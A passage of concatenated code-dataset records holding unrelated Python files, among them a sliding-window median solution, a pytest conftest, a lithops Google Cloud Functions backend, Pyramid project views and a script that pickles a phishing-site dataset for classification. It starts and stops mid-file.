i in xrange(k, len(nums)): \r\n m, n, balance = nums[i-k], nums[i], 0 \r\n if m >= bheap[0]: # handle deleting\r\n balance -= 1\r\n if m == bheap[0]: # handle tops now; else we'd have to check top before balancing, then check tops again\r\n heappop(bheap)\r\n else:\r\n hashes[m] += 1\r\n else: \r\n balance += 1\r\n if m == -theap[0]: \r\n heappop(theap)\r\n else:\r\n hashes[m]+=1\r\n if bheap and n >= bheap[0]: # handle adding\r\n balance += 1\r\n heappush(bheap, n)\r\n else:\r\n balance -= 1\r\n heappush(theap, -n) \r\n if balance < 0: # len(bheap) < len(theap)\r\n heappush(bheap, -heappop(theap)) # the top of theap/bheap is always valid at this point\r\n elif balance > 0:\r\n heappush(theap, -heappop(bheap)) \r\n while bheap and hashes[bheap[0]]: # the removed-from heap might have an invalid top, so fix (doesn't change balance)\r\n hashes[heappop(bheap)] -= 1\r\n while theap and hashes[-theap[0]]:\r\n hashes[-heappop(theap)] -= 1 \r\n medians.append(float(bheap[0]) if k&1 else (bheap[0] - theap[0]) / 2.0) \r\n return medians\r\n \r\n # Based off: 
https://discuss.leetcode.com/topic/74679/o-n-log-n-time-c-solution-using-two-heaps-and-a-hash-table/4\r\n def solution3(self, nums, k): \r\n \"\"\"After changes, basically the same as Solution2, but with more explicit variable names and slightly diff initialization\"\"\"\r\n to_be_deleted, res = defaultdict(int), []\r\n top_half, bottom_half = nums[:k], []\r\n heapq.heapify(top_half)\r\n while len(top_half) - len(bottom_half) > 1:\r\n heappush(bottom_half, -heappop(top_half))\r\n res.append(float(top_half[0]) if k&1 else (top_half[0] - bottom_half[0])/2.0)\r\n for i in xrange(k, len(nums)):\r\n num, num_to_be_deleted = nums[i], nums[i-k]\r\n top_bottom_balance = 0\r\n if num_to_be_deleted >= top_half[0]:\r\n top_bottom_balance -= 1\r\n if num_to_be_deleted == top_half[0]:\r\n heappop(top_half)\r\n else:\r\n to_be_deleted[num_to_be_deleted] += 1\r\n else:\r\n top_bottom_balance += 1\r\n if num_to_be_deleted == -bottom_half[0]:\r\n heappop(bottom_half)\r\n else:\r\n to_be_deleted[num_to_be_deleted] += 1\r\n if top_half and num >= top_half[0]:\r\n top_bottom_balance+=1\r\n heappush(top_half, num)\r\n else:\r\n top_bottom_balance-=1\r\n heappush(bottom_half, -num)\r\n if top_bottom_balance > 0:\r\n heappush(bottom_half, -heappop(top_half))\r\n elif top_bottom_balance < 0:\r\n heappush(top_half, -heappop(bottom_half))\r\n while top_half and to_be_deleted[top_half[0]]:\r\n to_be_deleted[heappop(top_half)] -= 1\r\n while bottom_half and to_be_deleted[-bottom_half[0]]:\r\n to_be_deleted[-heappop(bottom_half)] -= 1\r\n \r\n res.append(float(top_half[0]) if k&1 else (top_half[0]-bottom_half[0])/2.0)\r\n return res\r\n ","sub_path":"leetcode/python/SlidingWindowMedian.py","file_name":"SlidingWindowMedian.py","file_ext":"py","file_size_in_byte":9499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"285125946","text":"import asyncio\nimport logging\nimport typing\n\nimport pytest\nfrom pytest_httpserver import httpserver\n\nfrom mergify_engine import config\nfrom mergify_engine import logs\nfrom mergify_engine import utils\nfrom mergify_engine.clients import github\n\n\n@pytest.fixture()\ndef logger_checker(request, caplog):\n # daiquiri removes all handlers during setup, as we want to sexy output and the pytest\n # capability at the same, we must add back the pytest handler\n logs.setup_logging()\n logging.getLogger(None).addHandler(caplog.handler)\n yield\n for when in (\"setup\", \"call\", \"teardown\"):\n messages = [\n rec.getMessage()\n for rec in caplog.get_records(when)\n if rec.levelname in (\"CRITICAL\", \"ERROR\")\n ]\n assert [] == messages\n\n\n@pytest.fixture(autouse=True)\ndef setup_new_event_loop() -> None:\n # ensure each tests have a fresh event loop\n asyncio.set_event_loop(asyncio.new_event_loop())\n\n\n@pytest.fixture()\nasync def redis_cache() -> typing.AsyncGenerator[utils.RedisCache, None]:\n with utils.aredis_for_cache() as client:\n await client.flushdb()\n try:\n yield client\n finally:\n await client.flushdb()\n client.connection_pool.disconnect()\n await utils.stop_pending_aredis_tasks()\n\n\n@pytest.fixture()\nasync def redis_stream() -> typing.AsyncGenerator[utils.RedisStream, None]:\n with utils.aredis_for_stream() as client:\n await client.flushdb()\n try:\n yield client\n finally:\n await client.flushdb()\n client.connection_pool.disconnect()\n await utils.stop_pending_aredis_tasks()\n\n\n@pytest.fixture()\nasync def github_server(\n httpserver: httpserver.HTTPServer, monkeypatch: pytest.MonkeyPatch\n) -> 
typing.AsyncGenerator[httpserver.HTTPServer, None]:\n monkeypatch.setattr(config, \"GITHUB_API_URL\", httpserver.url_for(\"/\")[:-1])\n monkeypatch.setattr(github.CachedToken, \"STORAGE\", {})\n\n httpserver.expect_request(\"/users/owner/installation\").respond_with_json(\n {\n \"id\": 12345,\n \"target_type\": \"User\",\n \"permissions\": {\n \"checks\": \"write\",\n \"contents\": \"write\",\n \"pull_requests\": \"write\",\n },\n \"account\": {\"login\": \"owner\", \"id\": 12345},\n }\n )\n httpserver.expect_request(\n \"/app/installations/12345/access_tokens\"\n ).respond_with_json({\"token\": \"\", \"expires_at\": \"2100-12-31T23:59:59Z\"})\n\n yield httpserver\n","sub_path":"mergify_engine/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"578312401","text":"# Nolan Harris\n# nph2tx\n# This program prints a range of ages you are compatible to date\n\nage = int(input(\"What is your age?: \"))\n\nage1 = (age // 2 + 7)\n\nage2 = (age * 2 - 13)\n\nprint(\"You can date people between\", age1, \"and\", age2)\n\n\n\n","sub_path":"CS1110/CS1110/dating.py/dating.py","file_name":"dating.py","file_ext":"py","file_size_in_byte":236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"224132167","text":"import gi\ngi.require_version(\"Gtk\", \"3.0\")\nimport gi.repository.Gtk as Gtk\nimport gi.repository.GdkPixbuf as GdkPixbuf\n\nclass MsgArrive(Gtk.Box):\n def __init__(self, Msg):\n Gtk.Box.__init__(self, orientation=Gtk.Orientation.HORIZONTAL, spacing=0)\n\n self.avatar = Gtk.Image()\n self.avatar.set_from_pixbuf(GdkPixbuf.Pixbuf.new_from_file_at_scale(\n filename=\"share/fancychat/preferences-desktop-emoticons.svg\",\n width=48,\n height=48,\n preserve_aspect_ratio=True\n ))\n\n self.msg = Gtk.Label(Msg)\n self.msg.get_style_context().add_class(\"msg-text-arrive\")\n #self.msg.set_halign(Gtk.Align.END)\n self.msg.set_justify(Gtk.Justification.RIGHT)\n self.msg.set_line_wrap(True)\n\n self.pack_start(self.avatar, False, False, 0)\n self.pack_start(self.msg, True, True, 0)","sub_path":"fancychat/MsgArrive.py","file_name":"MsgArrive.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"295546762","text":"import easygui as g\r\nimport os.path\r\n\r\nfile = g.fileopenbox()\r\nfile_name = os.path.basename(file)\r\nf = open(file)\r\nF = list(f)\r\ng.textbox('文件【%s】的内容如下:'%file_name,'显示文件内容',text = F)\r\nanswer = g.choicebox('检测到文件内容发生改变,请选择以下操作:','警告',choices = ['覆盖保存','放弃保存','另存为...'])\r\n\r\nif answer == '覆盖保存':\r\n f.close()\r\nelif answer == '另存为...':\r\n path = g.filesavebox(default = file)\r\n F_2 = open(path, 'w')\r\n F_2.writelines(F)\r\n F_2.close()\r\n \r\n","sub_path":"打开TXT文件(用IDLE运行会报错).py","file_name":"打开TXT文件(用IDLE运行会报错).py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"333472635","text":"#\n# Copyright Cloudlab URV 2020\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT 
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport os\nimport logging\nimport json\nimport base64\nimport httplib2\nimport zipfile\nimport time\nimport google.auth\nfrom google.cloud import pubsub_v1\nfrom google.oauth2 import service_account\nfrom google_auth_httplib2 import AuthorizedHttp\nfrom googleapiclient.discovery import build\nfrom google.auth import jwt\n\nfrom lithops import utils\nfrom lithops.version import __version__\nfrom lithops.constants import COMPUTE_CLI_MSG, JOBS_PREFIX, TEMP_DIR\n\nfrom . import config\n\nlogger = logging.getLogger(__name__)\n\n\nclass GCPFunctionsBackend:\n def __init__(self, gcf_config, internal_storage):\n self.name = 'gcp_functions'\n self.type = 'faas'\n self.gcf_config = gcf_config\n self.region = gcf_config['region']\n self.num_retries = gcf_config['retries']\n self.retry_sleep = gcf_config['retry_sleep']\n self.trigger = gcf_config['trigger']\n self.credentials_path = gcf_config.get('credentials_path')\n\n self.internal_storage = internal_storage\n\n self._build_api_resource()\n\n msg = COMPUTE_CLI_MSG.format('Google Cloud Functions')\n logger.info(f\"{msg} - Region: {self.region} - Project: {self.project_name}\")\n\n def _format_function_name(self, runtime_name, runtime_memory=None):\n version = 'lithops_v' + __version__\n runtime_name = (version + '_' + runtime_name).replace('.', '-')\n\n if runtime_memory:\n return f'{runtime_name}_{runtime_memory}MB'\n else:\n return f'{runtime_name}'\n \n def _unformat_function_name(self, function_name):\n runtime_name, runtime_memory = function_name.rsplit('_', 1)\n runtime_name = runtime_name.replace('lithops_v', '')\n version, runtime_name = runtime_name.split('_', 1)\n version = version.replace('-', '.')\n return version, runtime_name, runtime_memory.replace('MB', '')\n\n def _build_api_resource(self):\n \"\"\"\n Setup Credentials and resources\n \"\"\"\n if self.credentials_path and os.path.isfile(self.credentials_path):\n logger.debug(f'Getting GCP credentials from {self.credentials_path}')\n \n api_cred = service_account.Credentials.from_service_account_file(\n self.credentials_path, scopes=config.SCOPES\n )\n self.project_name = api_cred.project_id\n self.service_account = api_cred.service_account_email\n \n pubsub_cred = jwt.Credentials.from_service_account_file(\n self.credentials_path,\n audience=config.AUDIENCE\n ) \n else:\n logger.debug(f'Getting GCP credentials from the environment')\n api_cred, self.project_name = google.auth.default(scopes=config.SCOPES)\n self.service_account = api_cred.service_account_email\n pubsub_cred = None\n\n self._pub_client = pubsub_v1.PublisherClient(credentials=pubsub_cred)\n\n http = AuthorizedHttp(api_cred, http=httplib2.Http())\n self._api_resource = build(\n 'cloudfunctions', config.FUNCTIONS_API_VERSION,\n http=http, cache_discovery=False\n )\n\n @property\n def _default_location(self):\n return f'projects/{self.project_name}/locations/{self.region}'\n\n def _format_topic_name(self, runtime_name, runtime_memory):\n return self._format_function_name(runtime_name, runtime_memory) +'_'+ self.region + '_topic'\n\n def _get_default_runtime_name(self):\n py_version = utils.CURRENT_PY_VERSION.replace('.', '')\n return f'lithops-default-runtime-v{py_version}'\n\n def _get_topic_location(self, topic_name):\n return f'projects/{self.project_name}/topics/{topic_name}'\n\n def _get_function_location(self, function_name):\n return 
f'{self._default_location}/functions/{function_name}'\n\n def _get_runtime_bin_location(self, runtime_name):\n function_name = self._format_function_name(runtime_name)\n return config.USER_RUNTIMES_PREFIX + '/' + function_name + '_bin.zip'\n\n def _encode_payload(self, payload):\n return base64.b64encode(bytes(json.dumps(payload), 'utf-8')).decode('utf-8')\n\n def _list_built_runtimes(self, default_runtimes=True):\n \"\"\"\n Lists all the built runtimes uploaded by self.build_runtime()\n \"\"\"\n runtimes = []\n\n if default_runtimes:\n runtimes.extend(self._get_default_runtime_name())\n\n user_runtimes_keys = self.internal_storage.storage.list_keys(\n self.internal_storage.bucket, prefix=config.USER_RUNTIMES_PREFIX\n )\n runtimes.extend([runtime for runtime in user_runtimes_keys])\n return runtimes\n\n def _wait_function_deleted(self, function_location):\n # Wait until function is completely deleted\n while True:\n try:\n response = self._api_resource.projects().locations().functions().get(\n name=function_location\n ).execute(num_retries=self.num_retries)\n logger.debug(f'Function status is {response[\"status\"]}')\n if response['status'] == 'DELETE_IN_PROGRESS':\n time.sleep(self.retry_sleep)\n else:\n raise Exception(f'Unknown status: {response[\"status\"]}')\n except Exception as e:\n logger.debug(f'Function status is DELETED')\n break\n\n def _create_function(self, runtime_name, memory, timeout=60):\n \"\"\"\n Creates all the resources needed by a function\n \"\"\"\n # Create topic\n topic_name = self._format_topic_name(runtime_name, memory)\n topic_location = self._get_topic_location(topic_name)\n logger.debug(f\"Creating topic {topic_location}\")\n topic_list_response = self._pub_client.list_topics(\n request={'project': f'projects/{self.project_name}'})\n topics = [topic.name for topic in topic_list_response]\n if topic_location in topics:\n logger.debug(f\"Topic {topic_location} already exists - Restarting queue\")\n self._pub_client.delete_topic(topic=topic_location)\n self._pub_client.create_topic(name=topic_location)\n\n # Create the function\n function_name = self._format_function_name(runtime_name, memory)\n function_location = self._get_function_location(function_name)\n logger.debug(f\"Creating function {topic_location}\")\n\n fn_list_response = self._api_resource.projects().locations().functions().list(\n parent=self._default_location\n ).execute(num_retries=self.num_retries)\n if 'functions' in fn_list_response:\n deployed_functions = [fn['name'] for fn in fn_list_response['functions']]\n if function_location in deployed_functions:\n logger.debug(f\"Function {function_location} already exists - Deleting function\")\n self._api_resource.projects().locations().functions().delete(\n name=function_location,\n ).execute(num_retries=self.num_retries)\n self._wait_function_deleted(function_location)\n\n bin_location = self._get_runtime_bin_location(runtime_name)\n cloud_function = {\n 'name': function_location,\n 'description': 'Lithops Worker for Lithops v'+ __version__,\n 'entryPoint': 'main',\n 'runtime': config.AVAILABLE_PY_RUNTIMES[utils.CURRENT_PY_VERSION],\n 'timeout': str(timeout) + 's',\n 'availableMemoryMb': memory,\n 'serviceAccountEmail': self.service_account,\n 'maxInstances': 0,\n 'sourceArchiveUrl': f'gs://{self.internal_storage.bucket}/{bin_location}'\n }\n\n if self.trigger == 'http':\n cloud_function['httpsTrigger'] = {}\n\n elif self.trigger == 'pub/sub':\n topic_name = self._format_topic_name(runtime_name, memory)\n topic_location = 
self._get_topic_location(topic_name)\n cloud_function['eventTrigger'] = {\n 'eventType': 'providers/cloud.pubsub/eventTypes/topic.publish',\n 'resource': topic_location,\n 'failurePolicy': {}\n }\n\n logger.debug(f'Creating function {function_location}')\n response = self._api_resource.projects().locations().functions().create(\n location=self._default_location,\n body=cloud_function\n ).execute(num_retries=self.num_retries)\n\n # Wait until function is completely deployed\n logger.info('Waiting for the function to be deployed')\n while True:\n response = self._api_resource.projects().locations().functions().get(\n name=function_location\n ).execute(num_retries=self.num_retries)\n logger.debug(f'Function status is {response[\"status\"]}')\n if response['status'] == 'ACTIVE':\n break\n elif response['status'] == 'OFFLINE':\n raise Exception('Error while deploying Cloud Function')\n elif response['status'] == 'DEPLOY_IN_PROGRESS':\n time.sleep(self.retry_sleep)\n else:\n raise Exception(f\"Unknown status {response['status']}\")\n\n def build_runtime(self, runtime_name, requirements_file, extra_args=[]):\n logger.info(f'Building runtime {runtime_name} from {requirements_file}')\n\n if not requirements_file:\n raise Exception('Please provide a \"requirements.txt\" file with the necessary modules')\n\n try:\n entry_point = os.path.join(os.path.dirname(__file__), 'entry_point.py')\n utils.create_handler_zip(config.FH_ZIP_LOCATION, entry_point, 'main.py')\n with zipfile.ZipFile(config.FH_ZIP_LOCATION, 'a') as lithops_zip:\n lithops_zip.write(requirements_file, 'requirements.txt', zipfile.ZIP_DEFLATED)\n with open(config.FH_ZIP_LOCATION, \"rb\") as action_zip:\n action_bin = action_zip.read()\n bin_location = self._get_runtime_bin_location(runtime_name)\n self.internal_storage.put_data(bin_location, action_bin)\n finally:\n os.remove(config.FH_ZIP_LOCATION)\n\n logger.debug(f'Runtime {runtime_name} built successfuly')\n\n def _build_default_runtime(self, runtime_name):\n \"\"\"\n Builds the default runtime\n \"\"\"\n requirements_file = os.path.join(TEMP_DIR, 'gcf_default_requirements.txt')\n with open(requirements_file, 'w') as reqf:\n reqf.write(config.REQUIREMENTS_FILE)\n try:\n self.build_runtime(runtime_name, requirements_file)\n finally:\n os.remove(requirements_file)\n\n def deploy_runtime(self, runtime_name, memory, timeout):\n logger.info(f\"Deploying runtime: {runtime_name} - Memory: {memory} Timeout: {timeout}\")\n\n if runtime_name == self._get_default_runtime_name():\n self._build_default_runtime(runtime_name)\n\n self._create_function(runtime_name, memory, timeout)\n\n # Get runtime metadata\n runtime_meta = self._generate_runtime_meta(runtime_name, memory)\n\n return runtime_meta\n\n def delete_runtime(self, runtime_name, runtime_memory):\n function_name = self._format_function_name(runtime_name, runtime_memory)\n function_location = self._get_function_location(function_name)\n logger.info(f'Deleting runtime: {runtime_name} - {runtime_memory}MB')\n\n # Delete function\n self._api_resource.projects().locations().functions().delete(\n name=function_location,\n ).execute(num_retries=self.num_retries)\n logger.debug('Request Ok - Waiting until function is completely deleted')\n\n self._wait_function_deleted(function_location)\n\n # Delete Pub/Sub topic attached as trigger for the cloud function\n logger.debug('Listing Pub/Sub topics')\n topic_name = self._format_topic_name(runtime_name, runtime_memory)\n topic_location = self._get_topic_location(topic_name)\n topic_list_request = 
self._pub_client.list_topics(\n request={'project': f'projects/{self.project_name}'}\n )\n topics = [topic.name for topic in topic_list_request]\n if topic_location in topics:\n logger.debug(f'Going to delete topic {topic_name}')\n self._pub_client.delete_topic(topic=topic_location)\n logger.debug(f'Ok - topic {topic_name} deleted')\n\n # Delete user runtime from storage\n bin_location = self._get_runtime_bin_location(runtime_name)\n user_runtimes = self._list_built_runtimes(default_runtimes=False)\n if bin_location in user_runtimes:\n self.internal_storage.storage.delete_object(\n self.internal_storage.bucket, bin_location)\n\n def clean(self):\n logger.debug('Going to delete all deployed runtimes')\n runtimes = self.list_runtimes()\n for runtime_name, runtime_memory, version in runtimes:\n self.delete_runtime(runtime_name, runtime_memory)\n\n def list_runtimes(self, runtime_name='all'):\n logger.debug('Listing deployed runtimes')\n response = self._api_resource.projects().locations().functions().list(\n parent=self._default_location\n ).execute(num_retries=self.num_retries)\n\n deployed_runtimes = [f['name'].split('/')[-1] for f in response.get('functions', [])]\n runtimes = []\n for func_runtime in deployed_runtimes:\n if 'lithops_v' in func_runtime:\n version, fn_name, memory = self._unformat_function_name(func_runtime)\n if runtime_name == fn_name or runtime_name == 'all':\n runtimes.append((fn_name, memory, version))\n\n return runtimes\n\n def invoke(self, runtime_name, runtime_memory, payload={}):\n topic_location = self._get_topic_location(self._format_topic_name(runtime_name, runtime_memory))\n\n fut = self._pub_client.publish(\n topic_location,\n bytes(json.dumps(payload, default=str).encode('utf-8'))\n )\n invocation_id = fut.result()\n\n return invocation_id\n\n def _generate_runtime_meta(self, runtime_name, memory):\n logger.debug(f'Extracting runtime metadata from: {runtime_name}')\n\n function_name = self._format_function_name(runtime_name, memory)\n function_location = self._get_function_location(function_name)\n\n payload = {\n 'get_metadata': {\n 'runtime_name': runtime_name,\n 'storage_config': self.internal_storage.storage.storage_config\n }\n }\n\n # Data is b64 encoded so we can treat REST call the same as async pub/sub event trigger\n response = self._api_resource.projects().locations().functions().call(\n name=function_location,\n body={'data': json.dumps({'data': self._encode_payload(payload)})}\n ).execute(num_retries=self.num_retries)\n\n if 'result' in response and response['result'] == 'OK':\n object_key = '/'.join([JOBS_PREFIX, runtime_name + '.meta'])\n\n runtime_meta_json = self.internal_storage.get_data(object_key)\n runtime_meta = json.loads(runtime_meta_json)\n self.internal_storage.storage.delete_object(self.internal_storage.bucket, object_key)\n return runtime_meta\n elif 'error' in response:\n raise Exception(response['error'])\n else:\n raise Exception(f'Error at retrieving runtime meta: {response}')\n\n def get_runtime_key(self, runtime_name, runtime_memory):\n function_name = self._format_function_name(runtime_name, runtime_memory)\n runtime_key = os.path.join(self.name, __version__, self.project_name, self.region, function_name)\n logger.debug(f'Runtime key: {runtime_key}')\n\n return runtime_key\n\n def get_runtime_info(self):\n \"\"\"\n Method that returns all the relevant information about the runtime set\n in config\n \"\"\"\n if utils.CURRENT_PY_VERSION not in config.AVAILABLE_PY_RUNTIMES:\n raise Exception(f'Python {utils.CURRENT_PY_VERSION} 
is not available for Google '\n f'Cloud Functions. Please use one of {config.AVAILABLE_PY_RUNTIMES.keys()}')\n\n if 'runtime' not in self.gcf_config or self.gcf_config['runtime'] == 'default':\n self.gcf_config['runtime'] = self._get_default_runtime_name()\n \n runtime_info = {\n 'runtime_name': self.gcf_config['runtime'],\n 'runtime_memory': self.gcf_config['runtime_memory'],\n 'runtime_timeout': self.gcf_config['runtime_timeout'],\n 'max_workers': self.gcf_config['max_workers'],\n }\n\n return runtime_info\n","sub_path":"lithops/serverless/backends/gcp_functions/gcp_functions.py","file_name":"gcp_functions.py","file_ext":"py","file_size_in_byte":17364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"564658941","text":"#!/usr/bin/python3.4\n# coding=utf-8\n\nimport sys\nimport socket\n\ndef socket_client_func():\n\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect(('127.0.0.1',9999))\n\n print('send msg')\n s.send(b'msg 1')\n\n buffer = []\n while True:\n d = s.recv(1024)\n if d:\n buffer.append(d)\n else:\n break\n\n s.close()\n print(buffer)\n\nif __name__ == '__main__':\n socket_client_func()\n","sub_path":"3.py","file_name":"3.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"251857650","text":"import html2text\nfrom os import listdir\nimport re, string\nimport pickle\nfrom shutil import rmtree\n\ndef read_html_files(directory):\n ''' \n Puts a list of rendered and cleaned text from the html and URLs of the UNIMAS phishing dataset\n into a binary file for easy reading.\n Args:\n directory: A string that is the directory to read files from. \n Should be \"phishing_site_dataset/Legitimate\" or \"phishing_site_dataset/Phishing\"\n '''\n\n html = []\n \n folders_to_read = listdir(directory)\n num_folders_to_read = len(folders_to_read)\n folders_to_read = iter(folders_to_read)\n\n i = 0\n while True:\n try:\n folder = next(folders_to_read)\n html_dir = directory + '/' + folder + '/RAW-HTML/'\n\n with open(html_dir + listdir(html_dir)[0], 'r', encoding = \"ISO-8859-1\") as f:\n data = f.read()\n html_data = html2text.html2text(data)\n\n # Clean data by removing non alphabetic characters\n pattern = re.compile('[^a-zA-Z ]')\n html_data = pattern.sub('', html_data)\n\n html.append([html_data])\n\n with open(directory + '/' + folder + '/URL/URL.txt', 'r') as f:\n html[i].append(f.read())\n\n i += 1\n \n except (FileNotFoundError, NotImplementedError):\n rmtree(directory + '/' + folder + '/')\n\n except StopIteration:\n break\n \n \n if i % 500 == 0:\n print(f'Read {i} out of {num_folders_to_read} folders')\n # print('Data from current read:\\n', html[i])\n\n return html\n\nwith open('phishing_site_dataset/phishing.pickle', 'wb') as output_file:\n pickle.dump(read_html_files('phishing_site_dataset/Phishing'), output_file)\n print('Successfully dumped Phishing data')\n\nwith open('phishing_site_dataset/legitimate.pickle', 'wb') as output_file:\n pickle.dump(read_html_files('phishing_site_dataset/Legitimate'), output_file)\n print('Successfully dumped Legitimate data')\n\n","sub_path":"generate_binary_data.py","file_name":"generate_binary_data.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"292812421","text":"from .Minions import *\r\nfrom .Spells import *\r\nfrom .Heros import *\r\nfrom .Weapons import *\r\n\r\nopeningHeros = 
[Malfurion, Rexxar, Jaina, Uther, Anduin, Valeera, Thrall, Guldan, Garrosh]\r\nCards = [[Moonfire,Claw,Acornbearer,],\r\n[ArcaneShot,ScavengingHyena,],\r\n[Countspell,],\r\n[MurlocKnight,],\r\n[Chameleos,NorthShireCleric,],\r\n[DeadlyPoison,Eviscerate,EdwinVanCleef,],\r\n[],\r\n[Defile,Howlfiend,Treachery,],\r\n[KoblodBarbarian,Gorehowl,],\r\n[MecHaroo,Pig,Wolf,BooldmageThalnos,IronbeakOwl,GrimPatron,],\r\n]","sub_path":"hsClient/gameModules/Cards4client.py","file_name":"Cards4client.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"292232798","text":"# -*- coding: utf-8 -*-\nfrom pyramid.view import view_config\nfrom pyramid.httpexceptions import HTTPFound\n\nfrom intranet3.utils.views import BaseView\nfrom intranet3.models import Client, Project, DBSession\nfrom intranet3.log import INFO_LOG\nfrom intranet3.forms.project import ProjectForm\nfrom intranet3.forms.common import DeleteForm\nfrom intranet3.models.project import SelectorMapping\n\nLOG = INFO_LOG(__name__)\n\n\n@view_config(route_name='project_view', permission='can_view_projects')\nclass View(BaseView):\n def get(self):\n project_id = self.request.GET.get('project_id')\n project = Project.query.get(project_id)\n return dict(project=project)\n\n\n@view_config(route_name='project_add', permission='can_edit_projects')\nclass Add(BaseView):\n def dispatch(self):\n client_id = self.request.GET.get('client_id')\n client = Client.query.get(client_id)\n form = ProjectForm(self.request.POST)\n if self.request.method == 'POST' and form.validate():\n tracker_id = form.tracker_id.data\n coordinator_id = int(form.coordinator_id.data) if form.coordinator_id.data.isdigit() else None\n project = Project(\n client=client,\n name=form.name.data,\n coordinator_id=coordinator_id,\n tracker_id=tracker_id,\n turn_off_selectors=form.turn_off_selectors.data,\n project_selector=form.project_selector.data,\n component_selector=form.component_selector.data,\n version_selector=form.version_selector.data,\n ticket_id_selector=form.ticket_id_selector.data,\n active=form.active.data,\n google_card=form.google_card.data,\n google_wiki=form.google_wiki.data,\n mailing_url=form.mailing_url.data,\n working_agreement=form.working_agreement.data,\n definition_of_done=form.definition_of_done.data,\n definition_of_ready=form.definition_of_ready.data,\n continuous_integration_url=form.continuous_integration_url.data,\n backlog_url=form.backlog_url.data,\n status = form.status.data,\n )\n DBSession.add(project)\n DBSession.flush()\n self.flash(self._(u\"Project added\"))\n LOG(u\"Project added\")\n SelectorMapping.invalidate_for(tracker_id)\n return HTTPFound(location=self.request.url_for('/client/view', client_id=project.client_id))\n return dict(client=client, form=form)\n\n@view_config(route_name='project_edit', permission='can_edit_sprints')\nclass Edit(BaseView):\n def dispatch(self):\n project_id = self.request.GET.get('project_id')\n project = DBSession.query(Project).filter(Project.id==project_id).one()\n form = ProjectForm(self.request.POST, obj=project)\n # hack, when user has no permision can_edit_projects (that means that he has only scrum perms)\n # we do not validate the form\n if self.request.method == 'POST' and (not self.request.has_perm('can_edit_projects') or form.validate()):\n project.working_agreement = form.working_agreement.data\n project.definition_of_done = form.definition_of_done.data\n project.definition_of_ready = 
form.definition_of_ready.data\n project.continuous_integration_url = form.continuous_integration_url.data\n project.backlog_url = form.backlog_url.data\n project.status = form.status.data\n project.sprint_tabs = form.sprint_tabs.data\n if self.request.has_perm('can_edit_projects'):\n project.name = form.name.data\n coordinator_id = int(form.coordinator_id.data) if form.coordinator_id.data.isdigit() else None\n project.coordinator_id = coordinator_id\n project.tracker_id = form.tracker_id.data\n project.turn_off_selectors = form.turn_off_selectors.data\n project.project_selector = form.project_selector.data\n project.component_selector = form.component_selector.data\n project.version_selector = form.version_selector.data\n project.ticket_id_selector = form.ticket_id_selector.data\n project.active = form.active.data\n project.google_card = form.google_card.data\n project.google_wiki = form.google_wiki.data\n project.mailing_url = form.mailing_url.data\n project.status = form.status.data\n\n self.flash(self._(u\"Project saved\"))\n LOG(u\"Project saved\")\n SelectorMapping.invalidate_for(project.tracker_id)\n return HTTPFound(location=self.request.url_for('/project/edit', project_id=project.id))\n return dict(project_id=project.id, form=form)\n\n\n@view_config(route_name='project_delete', renderer='intranet3:templates/common/delete.html', permission='can_delete_projects')\nclass Delete(BaseView):\n def dispatch(self):\n project_id = self.request.GET.get('project_id')\n project = Project.query.get(project_id)\n form = DeleteForm(self.request.POST)\n back_url = self.request.url_for('/client/view', client_id=project.client_id)\n if self.request.method == 'POST' and form.validate():\n DBSession.delete(project)\n SelectorMapping.invalidate_for(project.tracker_id)\n return HTTPFound(location=back_url)\n return dict(\n type_name=u'project',\n title=project.name,\n url=self.request.url_for('/project/delete', project_id=project.id),\n back_url=back_url,\n form=form\n )\n","sub_path":"src/intranet3/intranet3/views/project/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"96831883","text":"#!/usr/bin/env python3\nimport sys\nsys.setrecursionlimit(10**6)\n\ns = list(str(input()))\nt = list(str(input()))\n\nans = []\nfor i in range(len(s)-len(t)+1):\n # print(i)\n ans_tmp = \"\"\n for j in range(len(s)):\n if j >= i and i+len(t) > j:\n if s[j] == \"?\" or s[j] == t[j-i]:\n ans_tmp += t[j-i]\n else:\n break\n else:\n if s[j] == \"?\":\n ans_tmp += \"a\"\n else:\n ans_tmp += s[j]\n\n if len(ans_tmp) != len(s):\n continue\n else:\n ans.append(ans_tmp)\nans.sort()\n\nif len(ans) == 0:\n print(\"UNRESTORABLE\")\nelse:\n print(ans[0])\n","sub_path":"abc076/c/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"491786936","text":"import gym\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import Dataset, DataLoader\nimport torch.optim as optim\nfrom tqdm import tqdm\nfrom torch.distributions import Normal\nimport numpy as np\nimport holodeck\nfrom holodeck.sensors import *\nimport sys\n\n\ndef init_weights(m):\n if isinstance(m, nn.Linear):\n nn.init.normal_(m.weight, mean=0., std=0.1)\n 